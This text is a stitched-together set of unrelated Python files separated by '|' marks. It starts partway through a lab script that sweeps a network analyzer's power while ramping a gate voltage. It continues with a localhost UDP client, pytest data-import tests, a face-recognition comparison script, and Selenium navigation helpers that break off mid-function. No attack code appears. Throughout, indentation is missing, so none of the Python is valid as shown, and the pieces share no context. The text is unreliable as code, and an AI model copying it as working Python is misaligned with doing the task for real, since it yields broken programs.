- He7Temperature: to measure the temperature of the fridge
- Rigol: to power up the room-T amplifier
Before runnign the programm:
- Make sure that in S2d, the appropriate DAC (in cyurrent version, DAC 1) is set to S1h.
- Set an appropriate gain on the S1h
- If using DMM6500, switch to SCPI2000
- Make sure the low-T amplifier is well wired on the Matrix Module: Vg => pin #2, Vd => pin #3, GND => pin #4
- Make sure that room temperature amplifier is well wired: mounted on port 2 of the ZND and it is powered up with 15 V with Rigol
- Choose appropriate gate range (30V, 60V, 90V) and use the corresponding conversion factor as s1h_gain.
Wiring:
- For the reflection measurements with the directional-coupler inside the fridge: Out put of the ZND (port 2) is connected to the side port "-20 dB" of the coupler, "output " port
eventually connected to the Port 2 on ZND (through the circulator and low-T amplifier) and "input" port to the resonator.
- Gate connection is via the free pin 3 or 4 on the fridge; connected to the S1h using SMA to BNC and then BNC to Lemo convertions.
- Gate leakage monitoring using MCS to BNC cable from "Current monitor" probe on S1h to KEITHLEY.
'''
import os
import numpy as np
import time
import stlab
import stlabutils
from stlab.devices.RS_ZND import RS_ZND
from stlab.devices.He7Temperature import He7Temperature
from gate_pattern import gate_pattern
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import pygame, sys
from pygame.locals import *
from stlab.devices.IVVI import IVVI_DAC
from matplotlib import cm
from array import *
font = {'family': 'serif',
'color': 'darkred',
'weight': 'normal',
'size': 16,
}
###############################################################################################
''' Definitions'''
#definitions
prefix = 'C25_UL_3p5K'
time_step = 1 #time step between each gate voltage steps, to stablize the gate
ramp_spead = 1000 # the safe spead for ramping the gate voltage [mV/s]
gate = 0 # !!! becareful above +- 30V; normally it reaches the current limit of S1h (monitor the applied voltage using a separate Keithley).
start_freq = 4 # start grequency [GHz]
stop_freq = 8.5 # stop frequency [GHz]
freq_points = 501 # frequency sweep points
SweepTime = 0.5 # frequency sweep time [s]
frequency = np.linspace (start_freq,stop_freq,freq_points)
start_power = -40 #sweep power [dB] range: -45 to 3 dB
end_power = 3
power_points = 200
measure = 'OnePort' # 'OnePort' or 'TwoPort'
# IVVI settings
s1h_gain = 15 # [V/V] manua l gain set on S1h module
DAC = 1 # DAC linked to the S1h
# output setting
save_data =True
pygame.init()
pygame.display.set_mode((100,100))
STOP = False
monitor_ratio = 5 #shows 1 out of "monitor_ratio" spectrums
##########################################################
''' Initializing the devices '''
# resetting the IVVI
dev = IVVI_DAC('COM4') # IVVI
dev.RampAllZero()
# initializing the ZND
ZND = RS_ZND('TCPIP::192.168.1.149::INSTR', reset=True)
ZND.ClearAll()
if measure == 'OnePort':
ZND.SinglePort()
elif measure == 'TwoPort':
ZND.TwoPort()
ZND.SetSweepfrequency(start_freq, stop_freq, freq_points)
ZND.SetIFBW(1e3) #Set IF bandwidth in Hz
ZND.SetSweepTime(SweepTime)
ZND.AutoScale()
# initializing the temperature reading
tempdev = He7Temperature(addr='192.168.1.249',verb=False)
temp = 0
#############################################################
''' measurements '''
# generating gate pattern
power_pattern = np.linspace(start_power,end_power,power_points)
# modulating the gate voltage
count = 0 # couter of step numbers
leakage_current = 0
ramp_time = np.abs(np.floor(gate/ramp_spead))
dev.RampVoltage(DAC,1000*gate/s1h_gain,tt=ramp_time) # the factor 1000 is applied as the unit reads in mV.
Temp = np.array([])
S_amp = np.array([],[])
S_phase = np.array([],[])
for count,power in enumerate(power_pattern): # ramping up the gate voltage
ZND.SetPower(power)
data = ZND.MeasureScreen_pd()
if measure == 'OnePort':
amp_data = np.array(data['S11dB (dB)'])
phase_data = np.array(data['S11Ph (rad)'])
elif measure == 'TwoPort':
amp_data = np.array(data['S21dB (dB)'])
phase_data = np.array(data['S21Ph (rad)'])
if count == 0:
S_amp = amp_data
S_phase = phase_data
plt.plot(data['Frequency (Hz)'],phase_data)
plt.show()
Min = float(input('please enter min frequecy range for fitting the phase [GHz]:'))
Max = float(input('please enter max frequecy range for fitting the phase [GHz]:'))
index_1 = (np.abs(data['Frequency (Hz)'] - 1e9*Min)).argmin()
index_2 = (np.abs(data['Frequency (Hz)'] - 1e9*Max)).argmin()
z = np.polyfit(data['Frequency (Hz)'][index_1:index_2], (phase_data[index_1:index_2]), 1)
adjusted_phase = (phase_data-z[0]*data['Frequency (Hz)'])*180/np.pi
adjusted_phase -= np.amin(adjusted_phase)
else:
S_amp = np.array(np.vstack((S_amp,amp_data)))
S_phase = np.array(np.vstack((S_phase,adjusted_phase)))
plt.rcParams["figure.figsize"] = [16,9]
if (count-1)//monitor_ratio == (count-1)/monitor_ratio:
plt.subplot(4, 1, 1)
plt.plot(data['Frequency (Hz)'],amp_data)
plt.ylabel('S11dB (dB)')
plt.text(10, .25,['Power: ', ZND.GetPower() , 'dB'], fontdict=font)
plt.xlim(1e9*start_freq,1e9*stop_freq)
plt.subplot(4, 1, 2)
plt.plot(data['Frequency (Hz)'],adjusted_phase)
plt.ylabel('Phase (°)')
plt.xlim(1e9*start_freq,1e9*stop_freq)
plt.subplot(4, 1, 3)
plt.contourf(data['Frequency (Hz)'],power_pattern[0:count+1],S_amp)
plt.ylabel('power (dB)')
plt.title('S11dB (dB)')
plt.subplot(4, 1, 4)
plt.contourf(data['Frequency (Hz)'],power_pattern[0:count+1],S_phase)
plt.ylabel('power (dB)')
plt.xlabel('Frequency (Hz)')
plt.title('Phase (°)')
plt.pause(0.1)
if save_data:
# temp = tempdev.GetTemperature()
data['Power (dBm)'] = ZND.GetPower()
data['Gate Voltage (V)'] = gate
data['Temperature (K)'] = temp
data['Adjusted Phase (°)'] = adjusted_phase
if count==0:
Data = stlab.newfile(prefix,'_',data.keys(),autoindex = True)
stlab.savedict(Data, data)
Temp = np.append(Temp,temp)
# stlab.metagen.fromarrays(Data,data['Frequency (Hz)'],powers[0:i+1],xtitle='Frequency (Hz)', ytitle='Power (dB)',colnames=data.keys())
# stlab.writeline(Data,data)
# stlab.writeline(Gate_Data,[gate_voltage, leakage_current])
for event in pygame.event.get(): # stopping if 's' pressed
if event.type == QUIT: sys.exit()
if event.type == KEYDOWN and event.dict['key'] == 115: # corresponding to character "s"
STOP = True
if STOP:
break
dev.RampVoltage(DAC,0,tt=ramp_time) # to safely return back the gate voltage
dev.close()
print('FINISHED')
#############################################################
''' output '''
if save_data:
plt.savefig(os.path.dirname(Data.name)+'\\'+prefix)
Data.close()
plt.close()
|
# client端执行命令
import socket
skt_client = socket.socket(type=socket.SOCK_DGRAM)
ip_port = ('127.0.0.1', 8080)
skt_client.sendto(b'Hi', ip_port)
skt_client.close() |
import pytest
from core.fluent import Fluent
from core.src.custom_annotations import zid, tags
@tags('dataimport')
@zid('11111')
def test_import_same(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to exact same title based mapping
b) file should have content for all fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SAME') \
.include_both_standard_and_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11112')
def test_import_same_only_standard_fields(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to exact same title based mapping
b) file should have content for standard fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SAME') \
.include_only_standard_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11113')
def test_import_same_only_udf_fields(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to exact same title based mapping
b) file should have content for udf fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SAME') \
.include_only_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=1) \
.import_file().verify()
@tags('dataimport')
@zid('11114')
def test_import_similar(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to similar title based mapping
b) file should have content for all fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SIMILAR') \
.include_both_standard_and_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11115')
def test_import_similar_only_standard_fields(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to similar title based mapping
b) file should have content for standard fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SIMILAR') \
.include_only_standard_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11116')
def test_import_similar_only_udf(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to similar title based mapping
b) file should have content for udf fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SIMILAR') \
.include_only_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11117')
def test_import_manual(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to manual title based mapping
b) file should have content for all fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('Manual') \
.include_both_standard_and_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11118')
def test_import_manual_only_standard(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to manual title based mapping
b) file should have content for standard fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('MANUAL') \
.include_only_standard_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('11119')
def test_import_manual_only_udf_fields(request):
"""
Validate data import for creation of 5 asset when:
a) dataimport field mapping is set to manual title based mapping
b) file should have content for udf fields and mandatory udf fields
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('MANUAL') \
.include_only_udf_fields() \
.populate_dynamic_data_to_excel_file(no_of_rows=5) \
.import_file().verify()
@tags('dataimport')
@zid('111112')
def test_import_for_special_char_in_pick_list(request):
"""
Validate data import for creation of asses when:
Data import xls has "ASSET ASSIGNED TO" field value with 'T&E, Automation'
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SAME') \
.include_both_standard_and_udf_fields() \
.set_fields({'assigned to': 'T&E, Automation'}) \
.populate_dynamic_data_to_excel_file(no_of_rows=1) \
.import_file().verify()
@tags('dataimport')
@zid('111113')
def test_import_for_resource_with_middlename_in_pick_list(request):
"""
Validate data import for creation of asses when:
Data import xls has "ASSET ASSIGNED TO" field value with 'T&E, Automation'
"""
Fluent(request). \
data_import().create_for_entity('ASSET') \
.where_field_mapping_is('SAME') \
.include_both_standard_and_udf_fields() \
.set_fields({'assigned to': 'TEUser, QA'}) \
.populate_dynamic_data_to_excel_file(no_of_rows=1) \
.import_file().verify()
|
import face_recognition
import cv2
import argparse
# Construct the argument parser and parse argument
ap = argparse.ArgumentParser()
ap.add_argument('-i1', '--image1', default='person_1.jpg',
help='Path to input image 1, the first person you would like to recognize')
ap.add_argument('-i2', '--image2', default='person_2.jpg',
help='Path to input image 2, the second person you would like to recognize')
ap.add_argument('-i3', '--image3', default='person_3.jpg',
help='Path to input image 3, the third person you would like to recognize')
ap.add_argument('-i4', '--input', default='unknown_1.jpg',
help='Path to input image 4, the unknown person you would like to recognize')
args = ap.parse_args()
# Load the known images
img_1 = cv2.imread(args.image1)
img_2 = cv2.imread(args.image2)
img_3 = cv2.imread(args.image3)
# Get the face encoding of each person. This can fail if no one is found in the photo,
# Note that in img_1 img_2 img_3 there is only one face therefore we index a [0].
person_1_face_encoding = face_recognition.face_encodings(img_1)[0]
person_2_face_encoding = face_recognition.face_encodings(img_2)[0]
person_3_face_encoding = face_recognition.face_encodings(img_3)[0]
# Create a list of all known face encodings
known_face_encodings = [
person_1_face_encoding,
person_2_face_encoding,
person_3_face_encoding
]
# Load the image we want to check
unknown_img = cv2.imread(args.input)
# Get face encodings for any people in the picture
unknown_face_encodings = face_recognition.face_encodings(unknown_img)
# There might be more than one person in the photo, so we need to loop over each face we found
for unknown_face_encoding in unknown_face_encodings:
# Test if this unknown face encoding matches any of the three people we know
results = face_recognition.compare_faces(known_face_encodings, unknown_face_encoding,
tolerance=0.6)
name = "Unknown"
if results[0]:
name = "Person 1"
elif results[1]:
name = "Person 2"
elif results[2]:
name = "Person 3"
print(f"Found {name} in the photo!")
|
from selenium.webdriver import ActionChains
from DestroyerRobot.automation.util.ConfigUtil import Config
from DestroyerRobot.automation.util.XmlUtil import XmlUtil
from DestroyerRobot.automation.util.SystemOsUtil import SystemOs
from DestroyerRobot.automation.util.DateTimeUtil import TestDateTime
from DestroyerRobot.automation.com.cn.new_cms.servers.NC_TreeKids.NCTreeKids import MPTreeKids
from DestroyerRobot.automation.com.cn.base.BasePage import BasePage
from selenium import webdriver
import traceback
class test_nctree_kids:
def __init__(self,driver):
"""
实现数据后,定位页面信息操作
登录页面,操作数据
"""
self.driver = driver
def rootChildConfigPath(self):
# 从主配置文件中获取子配置文件路径
conf2 = Config("ConfigKIDs")
# 获取子文件路径
confFile = conf2.get_configPath("new_cms_configs")
return confFile
def childConfigXML(self,Pageskeyword,UIElementkeyword):
confFile = self.rootChildConfigPath()
config2 = Config("XMLFilePath", confFile)
filepath = config2.get_path_config("basic_tree")
filepath = SystemOs().sys_path(filepath)
xmlspath = XmlUtil(filepath)
# 获取XML中相关信息
xmls = xmlspath.xml_parsing(Pageskeyword, UIElementkeyword)
return xmls
def childConfigImgPath(self):
"""
获取图片路径,并新建以日期为基础的文件目录名 例如: img/2019-01-01/
:return:
"""
confFile = self.rootChildConfigPath()
config3 = Config("ImgPath",confFile)
img_path = config3.get_path_config("error_img")
data_path = TestDateTime().local_day()
img_path = SystemOs().sys_path(img_path,data_path)
SystemOs().mkdirs_file(img_path)
return img_path
# 配置中心 -> 基础数据
def get_link_Area_management(self):
"""
片区管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "片区管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Area_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Bank_Data_management(self):
"""
银行数据配置
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "银行数据配置")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Bank_Data_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 配置中心 -> 成交节点
def get_link_Node_rule_settings(self):
"""
节点规则管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "节点规则管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Node_rule_settings(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Settlement_Rules(self):
"""
结佣规则管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "结佣规则管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Settlement_Rules(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 配置中心 -> 接口配置
def get_link_Customer_State_Mapping(self):
"""
客户状态映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "客户状态映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Customer_State_Mapping(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Project_mapping(self):
"""
外部项目映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "外部项目映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_mapping(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Interface_mapping(self):
"""
外部接口映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "外部接口映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Interface_mapping(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Kingdee_push_Management(self):
"""
金蝶推送管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "金蝶推送管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Kingdee_push_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Auxiliary_Account_Mapping(self):
"""
辅助账项目映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "辅助账项目映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Auxiliary_Account_Mapping(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_dev_Organizational_Relations(self):
"""
楼盘映射组织关系
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "楼盘映射组织关系")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.dev_Organizational_Relations(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Auxiliary_Accounts_Mapping(self):
"""
辅助账供应商映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "辅助账供应商映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Auxiliary_Accounts_Mapping(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Auxiliary_Account_Customer(self):
"""
辅助账客户映射
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "辅助账客户映射")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Auxiliary_Account_Customer(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 配置中心 -- 驳回设置
def get_link_Reject_Category_Management(self):
"""
驳回类目管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("配置中心", "驳回类目管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Reject_Category_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Rejection_Cause_Management(self):
"""
驳回原因管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("左侧导航栏", "驳回原因管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Rejection_Cause_Management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 标准管控 -- 标准管理
def get_link_Project_Cooperation_Criteria(self):
"""
项目合作标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "项目合作标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Project_Cooperation_Criteria(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Award_criteria(self):
"""
团奖标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "团奖标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Award_criteria(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Commission_settlement_standard(self):
"""
佣金结算标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "佣金结算标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Commission_settlement_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Cost_Control_Standard(self):
"""
费用管控标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "费用管控标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Cost_Control_Standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_investment_Control_standard(self):
"""
跟投管控标准
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "跟投管控标准")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.investment_Control_standard(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 标准管控 -- 费用结算
def get_link_Expense_settlement_management(self):
"""
费用结算管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("标准管控", "费用结算管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Expense_settlement_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 合约中心 -- 签约方管理
def get_link_legal_person_management(self):
"""
内部法人管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "内部法人管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.legal_person_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Channel_brokerage_management(self):
"""
渠道/经纪管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "渠道/经纪管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Channel_brokerage_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Developer_management(self):
"""
开发商管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "开发商管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Developer_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 合约中心 -- 合同管理
def get_link_Contract_signing_management(self):
"""
合同签订管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "合同签订管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Contract_signing_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Termination_contract(self):
"""
合同终止
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "合同终止")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Termination_contract(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Contract_enquiry(self):
"""
合同查询
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "合同查询")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Contract_enquiry(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Contract_type_management(self):
"""
合同类型管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "合同类型管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Contract_type_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Model_management(self):
"""
范本管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "范本管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Model_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 合约中心 -- 跟投规则
def get_link_investment_Allocation_rule(self):
"""
跟投分配规则
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "跟投分配规则")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.investment_Allocation_rule(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_Dividend_settlement_rule(self):
"""
分红结算规则
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "分红结算规则")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.Dividend_settlement_rule(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
# 合约中心 -- 跟投管理
def get_link_investment_project_management(self):
"""
跟投项目管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "跟投项目管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.investment_project_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
print(traceback.format_exc())
def get_link_investment_Payment_management(self):
"""
跟投支付管理
:return:
"""
# 获取XML中相关信息
bys_points, values_points = self.childConfigXML("合约中心", "跟投支付管理")
mptree = MPTreeKids(self.driver)
try:
BasePage(self.driver).move_to_ele(bys_points, values_points)
mptree.investment_Payment_management(bys_points, values_points)
mpdriver = mptree.base.get_driver()
return mpdriver
except Exception:
img_path = self.childConfigImgPath()
